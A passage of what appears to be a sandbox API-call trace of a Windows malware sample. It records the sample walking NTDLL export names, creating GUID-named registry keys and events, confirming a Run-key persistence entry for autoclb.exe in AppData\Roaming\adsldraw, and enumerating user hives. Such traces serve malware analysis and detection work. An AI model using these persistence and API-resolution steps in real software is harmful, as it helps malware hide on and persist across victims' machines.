CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.588] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.588] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.589] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.589] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.589] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.589] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.589] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.589] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.589] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.589] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.589] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.589] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.589] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.589] StrChrA (lpStart="ddraw.dll", wMatch=0x2e) returned=".dll" [0206.590] lstrlenA (lpString="adsldraw") returned 8 [0206.590] lstrcatW (in: lpString1="autoclb", lpString2=".exe" | out: lpString1="autoclb.exe") returned="autoclb.exe" [0206.590] wsprintfA (in: param_1=0x23c8778, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="667F6611-8D0F-88EB-47FA-113C6BCED530") returned 36 [0206.590] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0206.590] lstrcpyA (in: lpString1=0x23c8a58, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0206.590] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0206.590] wsprintfA (in: param_1=0x23c8778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 38 [0206.590] lstrlenA (lpString="Local\\") returned 6 [0206.590] lstrcpyA (in: lpString1=0x23c8ab0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0206.590] lstrcatA (in: lpString1="Local\\", lpString2="{2F87B751-C28A-394B-44D3-167DB8B7AA01}" | out: lpString1="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}" [0206.590] wsprintfA (in: param_1=0x23c8778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 38 [0206.591] lstrcatA (in: lpString1="", lpString2="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" | out: lpString1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" [0206.591] wsprintfA (in: param_1=0x23c8778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 38 [0206.592] lstrlenA (lpString="Local\\") returned 6 [0206.592] lstrcpyA (in: lpString1=0x23c8b18, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0206.592] lstrcatA (in: lpString1="Local\\", lpString2="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" | out: lpString1="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" [0206.592] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0206.592] lstrlenA (lpString="A_SHAFinal") returned 10 [0206.592] lstrlenA (lpString="A_SHAInit") returned 9 [0206.592] lstrlenA (lpString="A_SHAUpdate") returned 11 [0206.592] lstrlenA (lpString="AlpcAdjustCompletionListConcurrencyCount") returned 40 [0206.592] lstrlenA (lpString="AlpcFreeCompletionListMessage") returned 29 [0206.592] lstrlenA (lpString="AlpcGetCompletionListLastMessageInformation") returned 43 [0206.592] lstrlenA (lpString="AlpcGetCompletionListMessageAttributes") returned 38 [0206.592] lstrlenA (lpString="AlpcGetHeaderSize") returned 17 [0206.592] lstrlenA (lpString="AlpcGetMessageAttribute") returned 23 [0206.592] lstrlenA (lpString="AlpcGetMessageFromCompletionList") returned 32 [0206.592] lstrlenA (lpString="AlpcGetOutstandingCompletionListMessageCount") returned 44 [0206.592] lstrlenA (lpString="AlpcInitializeMessageAttribute") returned 30 [0206.592] lstrlenA (lpString="AlpcMaxAllowedMessageLength") returned 27 [0206.592] lstrlenA (lpString="AlpcRegisterCompletionList") returned 26 [0206.592] lstrlenA (lpString="AlpcRegisterCompletionListWorkerThread") returned 38 [0206.592] lstrlenA (lpString="AlpcRundownCompletionList") returned 25 [0206.592] lstrlenA (lpString="AlpcUnregisterCompletionList") returned 28 [0206.592] lstrlenA (lpString="AlpcUnregisterCompletionListWorkerThread") returned 40 [0206.592] lstrlenA (lpString="ApiSetQueryApiSetPresence") returned 25 [0206.592] lstrlenA (lpString="CsrAllocateCaptureBuffer") returned 24 [0206.592] lstrlenA (lpString="CsrAllocateMessagePointer") returned 25 [0206.592] lstrlenA (lpString="CsrCaptureMessageBuffer") returned 23 [0206.592] lstrlenA (lpString="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 43 [0206.592] lstrlenA (lpString="CsrCaptureMessageString") returned 23 [0206.592] lstrlenA (lpString="CsrCaptureTimeout") returned 17 [0206.592] lstrlenA (lpString="CsrClientCallServer") returned 19 [0206.592] lstrlenA (lpString="CsrClientConnectToServer") returned 24 [0206.592] lstrlenA (lpString="CsrFreeCaptureBuffer") returned 20 [0206.592] lstrlenA (lpString="CsrGetProcessId") returned 15 [0206.592] lstrlenA (lpString="CsrIdentifyAlertableThread") returned 26 [0206.592] lstrlenA (lpString="CsrSetPriorityClass") returned 19 [0206.593] lstrlenA (lpString="CsrVerifyRegion") returned 15 [0206.593] lstrlenA (lpString="DbgBreakPoint") returned 13 [0206.593] lstrlenA (lpString="DbgPrint") returned 8 [0206.593] lstrlenA (lpString="DbgPrintEx") returned 10 [0206.593] lstrlenA (lpString="DbgPrintReturnControlC") returned 22 [0206.593] lstrlenA (lpString="DbgPrompt") returned 9 [0206.593] lstrlenA (lpString="DbgQueryDebugFilterState") returned 24 [0206.593] lstrlenA (lpString="DbgSetDebugFilterState") returned 22 [0206.593] lstrlenA (lpString="DbgUiConnectToDbg") returned 17 [0206.593] lstrlenA (lpString="DbgUiContinue") returned 13 [0206.593] lstrlenA (lpString="DbgUiConvertStateChangeStructure") returned 32 [0206.593] lstrlenA (lpString="DbgUiConvertStateChangeStructureEx") returned 34 [0206.593] lstrlenA (lpString="DbgUiDebugActiveProcess") returned 23 [0206.593] lstrlenA (lpString="DbgUiGetThreadDebugObject") returned 25 [0206.593] lstrlenA (lpString="DbgUiIssueRemoteBreakin") returned 23 [0206.593] lstrlenA (lpString="DbgUiRemoteBreakin") returned 18 [0206.593] lstrlenA (lpString="DbgUiSetThreadDebugObject") returned 25 [0206.593] lstrlenA (lpString="DbgUiStopDebugging") returned 18 [0206.593] lstrlenA (lpString="DbgUiWaitStateChange") returned 20 [0206.593] lstrlenA (lpString="DbgUserBreakPoint") returned 17 [0206.593] lstrlenA (lpString="EtwCreateTraceInstanceId") returned 24 [0206.593] lstrlenA (lpString="EtwDeliverDataBlock") returned 19 [0206.593] lstrlenA (lpString="EtwEnumerateProcessRegGuids") returned 27 [0206.593] lstrlenA (lpString="EtwEventActivityIdControl") returned 25 [0206.593] lstrlenA (lpString="EtwEventEnabled") returned 15 [0206.593] lstrlenA (lpString="EtwEventProviderEnabled") returned 23 [0206.593] lstrlenA (lpString="EtwEventRegister") returned 16 [0206.593] lstrlenA (lpString="EtwEventSetInformation") returned 22 [0206.593] lstrlenA (lpString="EtwEventUnregister") returned 18 [0206.593] lstrlenA (lpString="EtwEventWrite") returned 13 [0206.593] lstrlenA (lpString="EtwEventWriteEndScenario") returned 24 [0206.593] lstrlenA (lpString="EtwEventWriteEx") returned 15 [0206.593] lstrlenA (lpString="EtwEventWriteFull") returned 17 [0206.593] lstrlenA (lpString="EtwEventWriteNoRegistration") returned 27 [0206.593] lstrlenA (lpString="EtwEventWriteStartScenario") returned 26 [0206.593] lstrlenA (lpString="EtwEventWriteString") returned 19 [0206.593] lstrlenA (lpString="EtwEventWriteTransfer") returned 21 [0206.593] lstrlenA (lpString="EtwGetTraceEnableFlags") returned 22 [0206.593] lstrlenA (lpString="EtwGetTraceEnableLevel") returned 22 [0206.593] lstrlenA (lpString="EtwGetTraceLoggerHandle") returned 23 [0206.593] lstrlenA (lpString="EtwLogTraceEvent") returned 16 [0206.593] lstrlenA (lpString="EtwNotificationRegister") returned 23 [0206.593] lstrlenA (lpString="EtwNotificationUnregister") returned 25 [0206.593] lstrlenA (lpString="EtwProcessPrivateLoggerRequest") returned 30 [0206.593] lstrlenA (lpString="EtwRegisterSecurityProvider") returned 27 [0206.594] lstrlenA (lpString="EtwRegisterTraceGuidsA") returned 22 [0206.594] lstrlenA (lpString="EtwRegisterTraceGuidsW") returned 22 [0206.594] lstrlenA (lpString="EtwReplyNotification") returned 20 [0206.594] lstrlenA (lpString="EtwSendNotification") returned 19 [0206.594] lstrlenA (lpString="EtwSetMark") returned 10 [0206.594] lstrlenA (lpString="EtwTraceEventInstance") returned 21 [0206.594] lstrlenA (lpString="EtwTraceMessage") returned 15 [0206.594] lstrlenA (lpString="EtwTraceMessageVa") returned 17 [0206.594] lstrlenA (lpString="EtwUnregisterTraceGuids") returned 23 [0206.594] lstrlenA (lpString="EtwWriteUMSecurityEvent") returned 23 [0206.594] lstrlenA (lpString="EtwpCreateEtwThread") returned 19 [0206.594] lstrlenA (lpString="EtwpGetCpuSpeed") returned 15 [0206.594] lstrlenA (lpString="EvtIntReportAuthzEventAndSourceAsync") returned 36 [0206.594] lstrlenA (lpString="EvtIntReportEventAndSourceAsync") returned 31 [0206.594] lstrlenA (lpString="ExpInterlockedPopEntrySListEnd") returned 30 [0206.594] lstrlenA (lpString="ExpInterlockedPopEntrySListFault") returned 32 [0206.594] lstrlenA (lpString="ExpInterlockedPopEntrySListResume") returned 33 [0206.594] lstrlenA (lpString="KiFastSystemCall") returned 16 [0206.594] lstrlenA (lpString="KiFastSystemCallRet") returned 19 [0206.594] lstrlenA (lpString="KiIntSystemCall") returned 15 [0206.594] lstrlenA (lpString="KiRaiseUserExceptionDispatcher") returned 30 [0206.594] lstrlenA (lpString="KiUserApcDispatcher") returned 19 [0206.594] lstrlenA (lpString="KiUserCallbackDispatcher") returned 24 [0206.594] lstrlenA (lpString="KiUserExceptionDispatcher") returned 25 [0206.594] lstrlenA (lpString="LdrAccessResource") returned 17 [0206.594] lstrlenA (lpString="LdrAddDllDirectory") returned 18 [0206.594] lstrlenA (lpString="LdrAddLoadAsDataTable") returned 21 [0206.594] lstrlenA (lpString="LdrAddRefDll") returned 12 [0206.594] lstrlenA (lpString="LdrAppxHandleIntegrityFailure") returned 29 [0206.594] lstrlenA (lpString="LdrDisableThreadCalloutsForDll") returned 30 [0206.594] lstrlenA (lpString="LdrEnumResources") returned 16 [0206.594] lstrlenA (lpString="LdrEnumerateLoadedModules") returned 25 [0206.594] lstrlenA (lpString="LdrFastFailInLoaderCallout") returned 26 [0206.594] lstrlenA (lpString="LdrFindEntryForAddress") returned 22 [0206.594] lstrlenA (lpString="LdrFindResourceDirectory_U") returned 26 [0206.594] lstrlenA (lpString="LdrFindResourceEx_U") returned 19 [0206.594] lstrlenA (lpString="LdrFindResource_U") returned 17 [0206.594] lstrlenA (lpString="LdrFlushAlternateResourceModules") returned 32 [0206.594] lstrlenA (lpString="LdrGetDllDirectory") returned 18 [0206.594] lstrlenA (lpString="LdrGetDllFullName") returned 17 [0206.594] lstrlenA (lpString="LdrGetDllHandle") returned 15 [0206.594] lstrlenA (lpString="LdrGetDllHandleByMapping") returned 24 [0206.594] lstrlenA (lpString="LdrGetDllHandleByName") returned 21 [0206.594] lstrlenA (lpString="LdrGetDllHandleEx") returned 17 [0206.594] lstrlenA (lpString="LdrGetDllPath") returned 13 [0206.595] lstrlenA (lpString="LdrGetFailureData") returned 17 [0206.595] lstrlenA (lpString="LdrGetFileNameFromLoadAsDataTable") returned 33 [0206.595] lstrlenA (lpString="LdrGetProcedureAddress") returned 22 [0206.595] lstrlenA (lpString="LdrGetProcedureAddressEx") returned 24 [0206.595] lstrlenA (lpString="LdrGetProcedureAddressForCaller") returned 31 [0206.595] lstrlenA (lpString="LdrInitShimEngineDynamic") returned 24 [0206.595] lstrlenA (lpString="LdrInitializeThunk") returned 18 [0206.595] lstrlenA (lpString="LdrLoadAlternateResourceModule") returned 30 [0206.595] lstrlenA (lpString="LdrLoadAlternateResourceModuleEx") returned 32 [0206.595] lstrlenA (lpString="LdrLoadDll") returned 10 [0206.595] lstrlenA (lpString="LdrLockLoaderLock") returned 17 [0206.595] lstrlenA (lpString="LdrOpenImageFileOptionsKey") returned 26 [0206.595] lstrlenA (lpString="LdrProcessRelocationBlock") returned 25 [0206.595] lstrlenA (lpString="LdrProcessRelocationBlockEx") returned 27 [0206.595] lstrlenA (lpString="LdrQueryImageFileExecutionOptions") returned 33 [0206.595] lstrlenA (lpString="LdrQueryImageFileExecutionOptionsEx") returned 35 [0206.595] lstrlenA (lpString="LdrQueryImageFileKeyOption") returned 26 [0206.595] lstrlenA (lpString="LdrQueryModuleServiceTags") returned 25 [0206.595] lstrlenA (lpString="LdrQueryOptionalDelayLoadedAPI") returned 30 [0206.595] lstrlenA (lpString="LdrQueryProcessModuleInformation") returned 32 [0206.595] lstrlenA (lpString="LdrRegisterDllNotification") returned 26 [0206.595] lstrlenA (lpString="LdrRemoveDllDirectory") returned 21 [0206.595] lstrlenA (lpString="LdrRemoveLoadAsDataTable") returned 24 [0206.595] lstrlenA (lpString="LdrResFindResource") returned 18 [0206.595] lstrlenA (lpString="LdrResFindResourceDirectory") returned 27 [0206.595] lstrlenA (lpString="LdrResGetRCConfig") returned 17 [0206.595] lstrlenA (lpString="LdrResRelease") returned 13 [0206.595] lstrlenA (lpString="LdrResSearchResource") returned 20 [0206.595] lstrlenA (lpString="LdrResolveDelayLoadedAPI") returned 24 [0206.595] lstrlenA (lpString="LdrResolveDelayLoadsFromDll") returned 27 [0206.595] lstrlenA (lpString="LdrRscIsTypeExist") returned 17 [0206.595] lstrlenA (lpString="LdrSetAppCompatDllRedirectionCallback") returned 37 [0206.595] lstrlenA (lpString="LdrSetDefaultDllDirectories") returned 27 [0206.595] lstrlenA (lpString="LdrSetDllDirectory") returned 18 [0206.595] lstrlenA (lpString="LdrSetDllManifestProber") returned 23 [0206.595] lstrlenA (lpString="LdrSetImplicitPathOptions") returned 25 [0206.595] lstrlenA (lpString="LdrSetMUICacheType") returned 18 [0206.595] lstrlenA (lpString="LdrShutdownProcess") returned 18 [0206.595] lstrlenA (lpString="LdrShutdownThread") returned 17 [0206.595] lstrlenA (lpString="LdrStandardizeSystemPath") returned 24 [0206.595] lstrlenA (lpString="LdrSystemDllInitBlock") returned 21 [0206.595] lstrlenA (lpString="LdrUnloadAlternateResourceModule") returned 32 [0206.596] lstrlenA (lpString="LdrUnloadAlternateResourceModuleEx") returned 34 [0206.596] lstrlenA (lpString="LdrUnloadDll") returned 12 [0206.596] lstrlenA (lpString="LdrUnlockLoaderLock") returned 19 [0206.596] lstrlenA (lpString="LdrUnregisterDllNotification") returned 28 [0206.596] lstrlenA (lpString="LdrVerifyImageMatchesChecksum") returned 29 [0206.596] lstrlenA (lpString="LdrVerifyImageMatchesChecksumEx") returned 31 [0206.596] lstrlenA (lpString="LdrWx86FormatVirtualImage") returned 25 [0206.596] lstrlenA (lpString="LdrpResGetMappingSize") returned 21 [0206.596] lstrlenA (lpString="LdrpResGetResourceDirectory") returned 27 [0206.596] lstrlenA (lpString="MD4Final") returned 8 [0206.596] lstrlenA (lpString="MD4Init") returned 7 [0206.596] lstrlenA (lpString="MD4Update") returned 9 [0206.596] lstrlenA (lpString="MD5Final") returned 8 [0206.596] lstrlenA (lpString="MD5Init") returned 7 [0206.596] lstrlenA (lpString="MD5Update") returned 9 [0206.596] lstrlenA (lpString="NlsAnsiCodePage") returned 15 [0206.596] lstrlenA (lpString="NlsMbCodePageTag") returned 16 [0206.596] lstrlenA (lpString="NlsMbOemCodePageTag") returned 19 [0206.596] lstrlenA (lpString="NtAcceptConnectPort") returned 19 [0206.596] lstrlenA (lpString="NtAccessCheck") returned 13 [0206.596] lstrlenA (lpString="NtAccessCheckAndAuditAlarm") returned 26 [0206.596] lstrlenA (lpString="NtAccessCheckByType") returned 19 [0206.596] lstrlenA (lpString="NtAccessCheckByTypeAndAuditAlarm") returned 32 [0206.596] lstrlenA (lpString="NtAccessCheckByTypeResultList") returned 29 [0206.596] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarm") returned 42 [0206.596] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarmByHandle") returned 50 [0206.596] lstrlenA (lpString="NtAddAtom") returned 9 [0206.596] lstrlenA (lpString="NtAddAtomEx") returned 11 [0206.596] lstrlenA (lpString="NtAddBootEntry") returned 14 [0206.596] lstrlenA (lpString="NtAddDriverEntry") returned 16 [0206.596] lstrlenA (lpString="NtAdjustGroupsToken") returned 19 [0206.596] lstrlenA (lpString="NtAdjustPrivilegesToken") returned 23 [0206.596] lstrlenA (lpString="NtAdjustTokenClaimsAndDeviceGroups") returned 34 [0206.596] lstrlenA (lpString="NtAlertResumeThread") returned 19 [0206.596] lstrlenA (lpString="NtAlertThread") returned 13 [0206.596] lstrlenA (lpString="NtAlertThreadByThreadId") returned 23 [0206.596] lstrlenA (lpString="NtAllocateLocallyUniqueId") returned 25 [0206.596] lstrlenA (lpString="NtAllocateReserveObject") returned 23 [0206.596] lstrlenA (lpString="NtAllocateUserPhysicalPages") returned 27 [0206.596] lstrlenA (lpString="NtAllocateUuids") returned 15 [0206.596] lstrlenA (lpString="NtAllocateVirtualMemory") returned 23 [0206.596] lstrlenA (lpString="NtAlpcAcceptConnectPort") returned 23 [0206.596] lstrlenA (lpString="NtAlpcCancelMessage") returned 19 [0206.596] lstrlenA (lpString="NtAlpcConnectPort") returned 17 [0206.596] lstrlenA (lpString="NtAlpcConnectPortEx") returned 19 [0206.596] lstrlenA (lpString="NtAlpcCreatePort") returned 16 [0206.597] lstrlenA (lpString="NtAlpcCreatePortSection") returned 23 [0206.597] lstrlenA (lpString="NtAlpcCreateResourceReserve") returned 27 [0206.597] lstrlenA (lpString="NtAlpcCreateSectionView") returned 23 [0206.597] lstrlenA (lpString="NtAlpcCreateSecurityContext") returned 27 [0206.597] lstrlenA (lpString="NtAlpcDeletePortSection") returned 23 [0206.597] lstrlenA (lpString="NtAlpcDeleteResourceReserve") returned 27 [0206.597] lstrlenA (lpString="NtAlpcDeleteSectionView") returned 23 [0206.597] lstrlenA (lpString="NtAlpcDeleteSecurityContext") returned 27 [0206.597] lstrlenA (lpString="NtAlpcDisconnectPort") returned 20 [0206.597] lstrlenA (lpString="NtAlpcImpersonateClientContainerOfPort") returned 38 [0206.597] lstrlenA (lpString="NtAlpcImpersonateClientOfPort") returned 29 [0206.597] lstrlenA (lpString="NtAlpcOpenSenderProcess") returned 23 [0206.597] lstrlenA (lpString="NtAlpcOpenSenderThread") returned 22 [0206.597] lstrlenA (lpString="NtAlpcQueryInformation") returned 22 [0206.597] lstrlenA (lpString="NtAlpcQueryInformationMessage") returned 29 [0206.597] lstrlenA (lpString="NtAlpcRevokeSecurityContext") returned 27 [0206.597] lstrlenA (lpString="NtAlpcSendWaitReceivePort") returned 25 [0206.597] lstrlenA (lpString="NtAlpcSetInformation") returned 20 [0206.597] lstrlenA (lpString="NtApphelpCacheControl") returned 21 [0206.597] lstrlenA (lpString="NtAreMappedFilesTheSame") returned 23 [0206.597] lstrlenA (lpString="NtAssignProcessToJobObject") returned 26 [0206.597] lstrlenA (lpString="NtAssociateWaitCompletionPacket") returned 31 [0206.597] lstrlenA (lpString="NtCallbackReturn") returned 16 [0206.597] lstrlenA (lpString="NtCancelIoFile") returned 14 [0206.597] lstrlenA (lpString="NtCancelIoFileEx") returned 16 [0206.597] lstrlenA (lpString="NtCancelSynchronousIoFile") returned 25 [0206.597] lstrlenA (lpString="NtCancelTimer") returned 13 [0206.597] lstrlenA (lpString="NtCancelTimer2") returned 14 [0206.597] lstrlenA (lpString="NtCancelWaitCompletionPacket") returned 28 [0206.597] lstrlenA (lpString="NtClearEvent") returned 12 [0206.597] lstrlenA (lpString="NtClose") returned 7 [0206.597] lstrlenA (lpString="NtCloseObjectAuditAlarm") returned 23 [0206.597] lstrlenA (lpString="NtCommitComplete") returned 16 [0206.597] lstrlenA (lpString="NtCommitEnlistment") returned 18 [0206.597] lstrlenA (lpString="NtCommitTransaction") returned 19 [0206.597] lstrlenA (lpString="NtCompactKeys") returned 13 [0206.597] lstrlenA (lpString="NtCompareObjects") returned 16 [0206.597] lstrlenA (lpString="NtCompareTokens") returned 15 [0206.597] lstrlenA (lpString="NtCompleteConnectPort") returned 21 [0206.597] lstrlenA (lpString="NtCompressKey") returned 13 [0206.603] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf013f, phkResult=0x1eafee4 | out: phkResult=0x1eafee4*=0x180) returned 0x0 [0206.603] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0206.603] RegQueryValueExW (in: hKey=0x180, lpValueName="cabilipc", lpReserved=0x0, lpType=0x1eafedc, lpData=0x23c8bd0, lpcbData=0x1eafee8*=0x76 | out: lpType=0x1eafedc*=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpcbData=0x1eafee8*=0x76) returned 0x0 [0206.603] lstrcmpiW (lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0 [0206.603] RegCloseKey (hKey=0x180) returned 0x0 [0206.603] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1 [0206.614] CreateEventA (lpEventAttributes=0x1eaff1c, bManualReset=1, bInitialState=0, lpName="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 0x1d4 [0206.614] GetLastError () returned 0x0 [0206.614] CloseHandle (hObject=0x1d4) returned 1 [0206.614] RegOpenKeyExA (in: hKey=0x80000003, lpSubKey=0x0, ulOptions=0x0, samDesired=0x20119, phkResult=0x1eafed0 | out: phkResult=0x1eafed0*=0x1d8) returned 0x0 [0206.614] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x0, lpName=0x23c8b50, lpcchName=0x1eafee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".DEFAULT", lpcchName=0x1eafee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0206.614] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0206.614] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x1, lpName=0x23c8b50, lpcchName=0x1eafee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-19", lpcchName=0x1eafee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0206.615] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0206.615] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x2, lpName=0x23c8b50, lpcchName=0x1eafee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-20", lpcchName=0x1eafee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0206.615] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0206.615] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x3, lpName=0x23c8b50, lpcchName=0x1eafee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-21-1462094071-1423818996-289466292-1000", lpcchName=0x1eafee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0206.615] StrChrA (lpStart="S-1-5-21-1462094071-1423818996-289466292-1000", wMatch=0x5f) returned 0x0 [0206.615] lstrcpyA (in: lpString1=0x1eafd54, lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000") returned="S-1-5-21-1462094071-1423818996-289466292-1000" [0206.615] lstrcatA (in: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", 